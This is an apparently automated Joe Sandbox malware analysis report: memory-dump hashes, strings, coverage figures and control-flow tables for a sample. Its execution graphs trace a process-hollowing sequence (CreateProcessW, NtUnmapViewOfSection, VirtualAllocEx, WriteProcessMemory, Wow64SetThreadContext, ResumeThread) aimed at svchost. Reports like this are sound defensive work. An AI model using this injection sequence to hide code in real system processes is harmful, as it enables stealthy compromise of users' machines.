                                      • Opcode Fuzzy Hash: 55c8bf59af8fb1ad5dbe3216f20ff03012681707b1ab353e486089b30118fd39
                                      • Instruction Fuzzy Hash: AF72A930A2DB894FE359DB28C4445B977F2FF95351B5006BED48AC76A2DE28EC06C781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9349cb09c9ddef588647073c4318de557741e3ffdaed032f8dba8e0f9ea427be
                                      • Instruction ID: ebbc98e0f1b0d30f2e76fcdac2b7caf7d9b3086ea86ac278dd5ebdc7a7f705e7
                                      • Opcode Fuzzy Hash: 9349cb09c9ddef588647073c4318de557741e3ffdaed032f8dba8e0f9ea427be
                                      • Instruction Fuzzy Hash: 35F19B3190DB864FE31DCB2884955BA77F3FF95301B1486BED4CAC72A1DE28A842C791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b78c3f4b94f708979f55c1b532f4f7519072aedaaa1d3bebb5590b739c247612
                                      • Instruction ID: 341c016cadc4c7cf506f6538c4128e66ed7d16cd488b471aa3e27df5920ef7a0
                                      • Opcode Fuzzy Hash: b78c3f4b94f708979f55c1b532f4f7519072aedaaa1d3bebb5590b739c247612
                                      • Instruction Fuzzy Hash: 10415C7160C64D0FD71E9A78885A1B57BE2EB96320B15C2BFD08BC72E7DD2898078391
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1368380492.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887c00000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "9y$A
                                      • API String ID: 0-495449579
                                      • Opcode ID: 86a2f971fe7f54861096baff64ac1d44671697ab805b4305e39cd89c6697d2b2
                                      • Instruction ID: a57298615e32a705ca2575a54d6d12ccbfecd04706e2a3b222717c42b1ce246f
                                      • Opcode Fuzzy Hash: 86a2f971fe7f54861096baff64ac1d44671697ab805b4305e39cd89c6697d2b2
                                      • Instruction Fuzzy Hash: 6072277184DBC64FE756DB28C8556A87FF1FF56340F1A06FAC099CB093DA28684AC781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1368380492.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887c00000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y$6<L?
                                      • API String ID: 0-3162929615
                                      • Opcode ID: 8e759649ebefd3ee743c02a85df17a9cb4164561589547281443f70c51147a18
                                      • Instruction ID: 3c1820fbd040fa36a126356b32abeac6ad940e09991e8fd132a9683b032e4a07
                                      • Opcode Fuzzy Hash: 8e759649ebefd3ee743c02a85df17a9cb4164561589547281443f70c51147a18
                                      • Instruction Fuzzy Hash: D1118F52A4EBC50FD3179A3818652E47FA0AF6B290F4E41FBD098CB1D3E80D89468762
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 2e40ca25d0edec8f1c5155af338041fb5085f59f1a0389f0112b7ee1d9954d4b
                                      • Instruction ID: 8555519ada86cb4edd953c323d3a5b620686a8be7a700eb531e994c206b9675f
                                      • Opcode Fuzzy Hash: 2e40ca25d0edec8f1c5155af338041fb5085f59f1a0389f0112b7ee1d9954d4b
                                      • Instruction Fuzzy Hash: 5031E43190C75C8FDB18DB9998466FD7BE1EB95321F00427FE08AD3242DA74A806C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1368380492.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887c00000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ?
                                      • API String ID: 0-1684325040
                                      • Opcode ID: 00df11b0f3c8429aa6001709bf2c3f96553610af47597cc630c37529078f1037
                                      • Instruction ID: 00a5069ef1c67c465479262eb8d3ff8f26db295a5d7e622fe97345c4c4f200c4
                                      • Opcode Fuzzy Hash: 00df11b0f3c8429aa6001709bf2c3f96553610af47597cc630c37529078f1037
                                      • Instruction Fuzzy Hash: 6B41E31194DBCA0FD70797388865AA57FB1EF67384B0A44FBC099CB1D3DA0C9946C392
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1368380492.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887c00000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fac689cdf49e8caffc316bdabf3e21c5542e3a2729bda82e74ce3e8a8435507f
                                      • Instruction ID: 51df11bf9d3782c5f606323252ddbb360fd59d733bcef1bea324e7fdcd4be15a
                                      • Opcode Fuzzy Hash: fac689cdf49e8caffc316bdabf3e21c5542e3a2729bda82e74ce3e8a8435507f
                                      • Instruction Fuzzy Hash: 87E0E531A046288ADB60DA48CC41BD9B3B1FB84240F0041E5D44DA3241CA306E84CB42
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1367691470.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff887b10000_LisectAVT_2403002A_136.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f18b87c3b351bdaaf3788c9dfed2550c323596d09f0279805a1a9d7818f27f4
                                      • Instruction ID: 2649ad0cf880c4965db191af264a9d44b7a8f29e6971368f80c3fc6acae49b52
                                      • Opcode Fuzzy Hash: 1f18b87c3b351bdaaf3788c9dfed2550c323596d09f0279805a1a9d7818f27f4
                                      • Instruction Fuzzy Hash: C962333191CA4B8FE7598B1884906B977F3FF95340F1441BDD49E8B5D7DE28A886CB80

                                      Execution Graph

                                      Execution Coverage:12.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:10%
                                      Total number of Nodes:30
                                      Total number of Limit Nodes:4
                                      execution_graph 22870 7ff887b23ac9 22871 7ff887b23ad5 CreateProcessW 22870->22871 22873 7ff887b23c02 22871->22873 22874 7ff887b2494a 22875 7ff887b24957 ResumeThread 22874->22875 22877 7ff887b249f4 22875->22877 22878 7ff887b23cea 22879 7ff887b23cf7 NtUnmapViewOfSection 22878->22879 22881 7ff887b23d9a 22879->22881 22865 7ff887b2423d 22866 7ff887b24219 22865->22866 22867 7ff887b2425b WriteProcessMemory 22865->22867 22869 7ff887b24311 22867->22869 22882 7ff887b23eed 22883 7ff887b23f0f 22882->22883 22884 7ff887b24009 22883->22884 22885 7ff887b240a6 VirtualAllocEx 22883->22885 22886 7ff887b240f6 22885->22886 22887 7ff887b243f1 22888 7ff887b243c9 22887->22888 22891 7ff887b2440b Wow64SetThreadContext 22887->22891 22890 7ff887b2458a 22891->22890 22901 7ff887b04cd9 22902 7ff887b04ce7 VirtualProtect 22901->22902 22904 7ff887b04dae 22902->22904 22892 7ff887b24676 22893 7ff887b24683 22892->22893 22894 7ff887b24649 22893->22894 22895 7ff887b24714 WriteProcessMemory 22893->22895 22896 7ff887b2475b 22895->22896
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: SectionUnmapView
                                      • String ID:
                                      • API String ID: 498011366-0
                                      • Opcode ID: 887201348578868aa1859668572a5ad2212d12bab92c87670ab446d72cf6a268
                                      • Instruction ID: f4f872752304e0174ba01825b9ab37f1ec81bb42db519e5c5768d1c5f532f01a
                                      • Opcode Fuzzy Hash: 887201348578868aa1859668572a5ad2212d12bab92c87670ab446d72cf6a268
                                      • Instruction Fuzzy Hash: 1021913090C64C8FDB58DF98D84A7E97BE1EB59320F04416BD04DD7252CA65A845CB92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1485 7ff887b243f1-7ff887b24409 1486 7ff887b243c9-7ff887b243d0 1485->1486 1487 7ff887b2440b-7ff887b2442f 1485->1487 1491 7ff887b243d2-7ff887b243e3 1486->1491 1492 7ff887b243e4-7ff887b243ef 1486->1492 1493 7ff887b24488 1487->1493 1494 7ff887b24431-7ff887b24487 1487->1494 1491->1492 1497 7ff887b2448a-7ff887b244bf 1493->1497 1498 7ff887b244d6-7ff887b244f1 1493->1498 1494->1493 1512 7ff887b244c1-7ff887b244d2 1497->1512 1513 7ff887b244d3 1497->1513 1499 7ff887b244f3 1498->1499 1500 7ff887b244f5-7ff887b24534 1498->1500 1499->1500 1502 7ff887b24535-7ff887b24588 Wow64SetThreadContext 1499->1502 1500->1502 1510 7ff887b2458a 1502->1510 1511 7ff887b24590-7ff887b245b7 1502->1511 1510->1511 1512->1513 1513->1498
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: 6y
                                      • API String ID: 983334009-1547487790
                                      • Opcode ID: 87ecdf3e309ee45e233e0ca51a222e0de8002f0d3d9a491504a3ee4a8dc9a616
                                      • Instruction ID: a6aa5acc81da2f32232096924a3daa477f234596c8893284b59c07a82c448371
                                      • Opcode Fuzzy Hash: 87ecdf3e309ee45e233e0ca51a222e0de8002f0d3d9a491504a3ee4a8dc9a616
                                      • Instruction Fuzzy Hash: 5F614531A1DA494FE758DA6CA8462F97BE2FF69360F4402BBD04CC7693DD246C46C781

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1812 7ff887bf0245-7ff887bf024c 1813 7ff887bf0296-7ff887bf0298 1812->1813 1814 7ff887bf024d-7ff887bf024e 1812->1814 1815 7ff887bf027f 1813->1815 1816 7ff887bf029a-7ff887bf02a0 1813->1816 1817 7ff887bf024f-7ff887bf026d 1814->1817 1822 7ff887bf0284-7ff887bf0286 1815->1822 1823 7ff887bf0234-7ff887bf023b 1816->1823 1824 7ff887bf02a2-7ff887bf02b8 1816->1824 1820 7ff887bf0273-7ff887bf027c 1817->1820 1821 7ff887bf03b1-7ff887bf03b7 1817->1821 1820->1815 1833 7ff887bf03b9-7ff887bf03c8 1821->1833 1825 7ff887bf02f7-7ff887bf0306 1822->1825 1826 7ff887bf0288-7ff887bf0289 1822->1826 1823->1821 1827 7ff887bf0241-7ff887bf0242 1823->1827 1824->1821 1828 7ff887bf02be-7ff887bf02d1 1824->1828 1830 7ff887bf0307-7ff887bf0309 1825->1830 1826->1817 1831 7ff887bf028b 1826->1831 1827->1812 1832 7ff887bf02d4 1828->1832 1830->1821 1834 7ff887bf030a-7ff887bf0348 1830->1834 1831->1830 1835 7ff887bf028d 1831->1835 1832->1821 1836 7ff887bf02da-7ff887bf02f5 1832->1836 1837 7ff887bf03c9-7ff887bf0427 1833->1837 1834->1833 1849 7ff887bf034a-7ff887bf034d 1834->1849 1835->1832 1838 7ff887bf028f-7ff887bf0293 1835->1838 1836->1825 1847 7ff887bf045c-7ff887bf0474 1837->1847 1848 7ff887bf0429-7ff887bf0440 1837->1848 1838->1813 1850 7ff887bf0442-7ff887bf045a 1848->1850 1851 7ff887bf04b1-7ff887bf04d0 1848->1851 1849->1837 1853 7ff887bf034f 1849->1853 1850->1847 1857 7ff887bf04d1-7ff887bf04e7 1850->1857 1851->1857 1855 7ff887bf0396-7ff887bf03b0 1853->1855 1856 7ff887bf0351-7ff887bf035f 1853->1856 1856->1855 1862 7ff887bf051c-7ff887bf056f 1857->1862 1863 7ff887bf04e9-7ff887bf0500 1857->1863 1865 7ff887bf0571-7ff887bf0590 1862->1865 1864 7ff887bf0502-7ff887bf051a 1863->1864 1863->1865 1864->1862 1868 7ff887bf0597-7ff887bf05c0 1865->1868 1869 7ff887bf0592 1865->1869 1872 7ff887bf05c2-7ff887bf062b 1868->1872 1873 7ff887bf0631-7ff887bf067a 1868->1873 1869->1868 1872->1873 1877 7ff887bf067c-7ff887bf067e 1873->1877 1878 7ff887bf06eb-7ff887bf06f9 1873->1878 1880 7ff887bf0680 1877->1880 1881 7ff887bf06fa-7ff887bf073c 1877->1881 1878->1881 1884 7ff887bf06c6-7ff887bf06c7 1880->1884 1885 7ff887bf0682-7ff887bf06a8 1880->1885 1887 7ff887bf0786-7ff887bf078b 1881->1887 1888 7ff887bf073e-7ff887bf0772 1881->1888 1898 7ff887bf06bc-7ff887bf06c5 1885->1898 1899 7ff887bf06aa-7ff887bf06b9 1885->1899 1889 7ff887bf0a42-7ff887bf0a56 1887->1889 1890 7ff887bf078c-7ff887bf079e 1887->1890 1888->1889 1892 7ff887bf0778-7ff887bf0781 1888->1892 1901 7ff887bf0a57-7ff887bf0a71 1889->1901 1894 7ff887bf079f-7ff887bf07bd 1890->1894 1893 7ff887bf0784-7ff887bf0785 1892->1893 1893->1887 1894->1889 1900 7ff887bf07c3-7ff887bf07d6 1894->1900 1898->1884 1899->1898 1904 7ff887bf0847-7ff887bf0856 1900->1904 1905 7ff887bf07d8-7ff887bf07d9 1900->1905 1906 7ff887bf0857-7ff887bf0859 1904->1906 1905->1894 1907 7ff887bf07db 1905->1907 1906->1889 1908 7ff887bf085a-7ff887bf0872 1906->1908 1907->1906 1909 7ff887bf07dd 1907->1909 1916 7ff887bf0874-7ff887bf0877 1908->1916 1917 7ff887bf08e3-7ff887bf08f0 1908->1917 1910 7ff887bf0824 1909->1910 1911 7ff887bf07df-7ff887bf07f0 1909->1911 1910->1889 1912 7ff887bf082a-7ff887bf0845 1910->1912 1911->1893 1918 7ff887bf07f2-7ff887bf0808 1911->1918 1912->1904 1920 7ff887bf08f3 1916->1920 1921 7ff887bf0879 1916->1921 1917->1920 1918->1889 1922 7ff887bf080e-7ff887bf0821 1918->1922 1920->1889 1923 7ff887bf08f9-7ff887bf090c 1920->1923 1924 7ff887bf08c0 1921->1924 1925 7ff887bf087b-7ff887bf08a2 1921->1925 1922->1910 1932 7ff887bf090e-7ff887bf0912 1923->1932 1933 7ff887bf097d-7ff887bf0990 1923->1933 1927 7ff887bf08c2 1924->1927 1928 7ff887bf08c3-7ff887bf08e1 1924->1928 1925->1889 1930 7ff887bf08a8-7ff887bf08be 1925->1930 1927->1928 1928->1917 1930->1889 1930->1924 1934 7ff887bf0914 1932->1934 1935 7ff887bf0993 1932->1935 1933->1935 1936 7ff887bf0974-7ff887bf097b 1934->1936 1935->1889 1937 7ff887bf0999-7ff887bf09b5 1935->1937 1936->1933 1940 7ff887bf09b7-7ff887bf09cc 1937->1940 1941 7ff887bf09d2-7ff887bf09e6 1937->1941 1940->1941 1941->1901 1942 7ff887bf09e8-7ff887bf09ed 1941->1942 1942->1936 1944 7ff887bf09ef 1942->1944 1944->1889
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1606111992.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887bf0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "9y$A
                                      • API String ID: 0-495449579
                                      • Opcode ID: 220d8899139b11672db903aa48c250720f666fb05ec73d6c56e60e1e89e24c6d
                                      • Instruction ID: b1a4020e1ea7c13bdca562135e072aab676b2992665bc4854fad39246a5d3058
                                      • Opcode Fuzzy Hash: 220d8899139b11672db903aa48c250720f666fb05ec73d6c56e60e1e89e24c6d
                                      • Instruction Fuzzy Hash: 0042377194D6898FE756DB28C8556BC7BF2FFA5740F1801FAC09DCB1A3DA286806C781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1606111992.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887bf0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y
                                      • API String ID: 0-1547487790
                                      • Opcode ID: e0aa2ffa0264241af95ce8d0788c3a3c131683876143d93e033b0ace334003fc
                                      • Instruction ID: c7a3c37f02069d17d75b44ea46352d55c5731a86573de5b54e6852c5cb4d6aa8
                                      • Opcode Fuzzy Hash: e0aa2ffa0264241af95ce8d0788c3a3c131683876143d93e033b0ace334003fc
                                      • Instruction Fuzzy Hash: 0F02023194DBCA4FE756D73888656A87FF2FF56740B0905FBC089CB1A3DA18580AC792
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 91f1f1c32f096c0da5d3ef64ec82dcbe3aad9ec57d32a0f39d9659d2cd0ec548
                                      • Instruction ID: 8b96ed5c5859d9bc214339d07f9169b8c7db86bbd4bddc59c45eaaad9aff66ba
                                      • Opcode Fuzzy Hash: 91f1f1c32f096c0da5d3ef64ec82dcbe3aad9ec57d32a0f39d9659d2cd0ec548
                                      • Instruction Fuzzy Hash: 5A71773191DB898FE759DB28D8465F9BBF1FF95310F14427ED08EC3292DA24A846C782
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7a6695eb21937465b815513beb093656886dff25323bbdfea1ef667f9838b35
                                      • Instruction ID: 238b0d805d455709d4c226e34f8beb5a14ba80ba31cfae51520814d6f90fe245
                                      • Opcode Fuzzy Hash: b7a6695eb21937465b815513beb093656886dff25323bbdfea1ef667f9838b35
                                      • Instruction Fuzzy Hash: A351AF3181CB4C8FDB59DB6C98446A9BBE1FB99310F44426FE48DD3292DB35A845CB81
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 45250580e01da55b496d6fa246572284a45717f6acfd9abae98ed5ad5a76c3b4
                                      • Instruction ID: ddbf9be608f7510a197da737d485ec3f50e1cfb4d0dab73b50764cfeca8e3aa6
                                      • Opcode Fuzzy Hash: 45250580e01da55b496d6fa246572284a45717f6acfd9abae98ed5ad5a76c3b4
                                      • Instruction Fuzzy Hash: 6F518B3180CB5C8FDB69DB5898446A9BBF1FBA9320F04426FE489D3252DB35A8458B81
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 6a9436f8843d1edeafe837c6fc35484c814e565f4e495a35e3a15ef94a2d6abe
                                      • Instruction ID: d2dbb368de32cba13c85826a31f15fa9f11b73290376968092e51316b702596e
                                      • Opcode Fuzzy Hash: 6a9436f8843d1edeafe837c6fc35484c814e565f4e495a35e3a15ef94a2d6abe
                                      • Instruction Fuzzy Hash: 4641293191CB488FDB19DB5CAC466FD7BE5EB9A321F04426FE08DC3192CA749846C792
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 6aa45fd6f8b29b1f36a91a23c2eb2d6579ea7f79e4068d41875698fa3ceaa40d
                                      • Instruction ID: d723d7fb9e6bf4a6f53bf7c18ee44ed48c35ec40c05aaab86c0e2d329d1c857e
                                      • Opcode Fuzzy Hash: 6aa45fd6f8b29b1f36a91a23c2eb2d6579ea7f79e4068d41875698fa3ceaa40d
                                      • Instruction Fuzzy Hash: AB41B27191CB488FDB18DF5898456FD7BF1FB99311F04426FD049D3252CA74A809CB82
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b00000_svchost.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 98b3d90b5f565bf7905ebdb42ebd9c5b586f1d3823cc9850adcae899deebedb2
                                      • Instruction ID: 1c64562495590792bbc6e8f59be3d7d4151ad0ec54e2747112892dd2b6796590
                                      • Opcode Fuzzy Hash: 98b3d90b5f565bf7905ebdb42ebd9c5b586f1d3823cc9850adcae899deebedb2
                                      • Instruction Fuzzy Hash: A831C43191C74C8FDB18DBAD98466FD7BE1EB95321F10427FE08AD3252DA74A806C786
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 94b8457def82eb04be0631c04cd55ec48a383c33a35aac6a4822adef4c60c06b
                                      • Instruction ID: b7d8eb32eac803f642614d8e5e2f474f750a9ed4ab4566f3e4a35f4b04b1ed01
                                      • Opcode Fuzzy Hash: 94b8457def82eb04be0631c04cd55ec48a383c33a35aac6a4822adef4c60c06b
                                      • Instruction Fuzzy Hash: 4831E43190CB5C8FDB18DF9898466F97BF1EBA9321F04426FE049D3252CB606856CB81
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1604784808.00007FF887B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B0A000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887b0a000_svchost.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: a9dec1652ccd713824070e1370b8688417822c2d868e52a211eb6f52bff48ea8
                                      • Instruction ID: b2b2b1803c3ff601cfa0b2c338f53f8ec3d965fda47a4f649d198e0c9a592526
                                      • Opcode Fuzzy Hash: a9dec1652ccd713824070e1370b8688417822c2d868e52a211eb6f52bff48ea8
                                      • Instruction Fuzzy Hash: 97219E3090CA4C8FDB58DBA8C849BE9BBF1FF96320F04416ED04DD3652CB65A856CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1606111992.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887bf0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6y
                                      • API String ID: 0-1547487790
                                      • Opcode ID: f018484f3e2a1c7115fd5f5788a1b0efb73fabbcc1a54519b39ebae2df60fe75
                                      • Instruction ID: 897a49deadc2cfd66bcb091283669c8ae189eadd388241ee0c1bbcad4608a7e7
                                      • Opcode Fuzzy Hash: f018484f3e2a1c7115fd5f5788a1b0efb73fabbcc1a54519b39ebae2df60fe75
                                      • Instruction Fuzzy Hash: B6216F6594E7C60FE347877818252A47FB1AF67550B4E41FBD488CB1E3E94D5846C312
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.1606111992.00007FF887BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff887bf0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0cb2fca8d1834a77b09a7de56ae22cc0012cc17b88a8f5caffc8f457da29e761
                                      • Instruction ID: 4c27428252400eeb45953eced91879f79340a24d81d269a90757b88b72643464
                                      • Opcode Fuzzy Hash: 0cb2fca8d1834a77b09a7de56ae22cc0012cc17b88a8f5caffc8f457da29e761
                                      • Instruction Fuzzy Hash: FDE0E531A046288EDB60DA48CC81BD9B3B1FB84240F0041E5D44DA3241CA306E84CB42

                                      Execution Graph

                                      Execution Coverage:12.5%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 16764 7ff887af4cd9 16765 7ff887af4ce7 VirtualProtect 16764->16765 16767 7ff887af4dae 16765->16767

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 793 7ff887be0245-7ff887be024c 794 7ff887be0296-7ff887be0298 793->794 795 7ff887be024d-7ff887be024e 793->795 797 7ff887be027f 794->797 798 7ff887be029a-7ff887be02a0 794->798 796 7ff887be024f-7ff887be026d 795->796 801 7ff887be03b1-7ff887be03b7 796->801 802 7ff887be0273-7ff887be027c 796->802 803 7ff887be0284-7ff887be0286 797->803 804 7ff887be0235-7ff887be023b 798->804 805 7ff887be02a2-7ff887be02b8 798->805 815 7ff887be03b9-7ff887be03c8 801->815 802->797 807 7ff887be02f7-7ff887be0306 803->807 808 7ff887be0288-7ff887be0289 803->808 804->801 809 7ff887be0241-7ff887be0242 804->809 805->801 806 7ff887be02be-7ff887be02d1 805->806 810 7ff887be02d4 806->810 812 7ff887be0307-7ff887be0309 807->812 808->796 813 7ff887be028b 808->813 809->793 810->801 814 7ff887be02da-7ff887be02f5 810->814 812->801 816 7ff887be030a-7ff887be0348 812->816 813->812 817 7ff887be028d 813->817 814->807 819 7ff887be03c9-7ff887be03e9 815->819 816->815 831 7ff887be034a-7ff887be034d 816->831 817->810 820 7ff887be028f-7ff887be0293 817->820 821 7ff887be03a6-7ff887be03b0 819->821 822 7ff887be03eb-7ff887be0427 819->822 820->794 829 7ff887be045c-7ff887be0474 822->829 830 7ff887be0429-7ff887be0440 822->830 832 7ff887be04b1-7ff887be04d0 830->832 833 7ff887be0442-7ff887be045a 830->833 831->819 834 7ff887be034f 831->834 836 7ff887be04d1-7ff887be0500 832->836 833->829 833->836 839 7ff887be0396-7ff887be03a5 834->839 840 7ff887be0351-7ff887be035f 834->840 846 7ff887be0571-7ff887be0590 836->846 847 7ff887be0502-7ff887be0534 836->847 839->821 840->839 848 7ff887be0597-7ff887be05c0 846->848 849 7ff887be0592 846->849 854 7ff887be0631-7ff887be067a 848->854 855 7ff887be05c2-7ff887be05f4 848->855 849->848 858 7ff887be067c-7ff887be067e 854->858 859 7ff887be06eb-7ff887be06f1 854->859 864 7ff887be0680 858->864 865 7ff887be06fa-7ff887be073c 858->865 862 7ff887be06f3-7ff887be06f9 859->862 863 7ff887be06ae-7ff887be06b9 859->863 862->865 876 7ff887be06bc-7ff887be06c5 863->876 866 7ff887be06c6-7ff887be06c7 864->866 867 7ff887be0682-7ff887be06a8 864->867 868 7ff887be0786-7ff887be078b 865->868 869 7ff887be073e-7ff887be0772 865->869 867->876 880 7ff887be06aa-7ff887be06ad 867->880 873 7ff887be0a42-7ff887be0a56 868->873 875 7ff887be078c-7ff887be079e 868->875 869->873 874 7ff887be0778-7ff887be0784 869->874 884 7ff887be0a57-7ff887be0a79 873->884 878 7ff887be0785 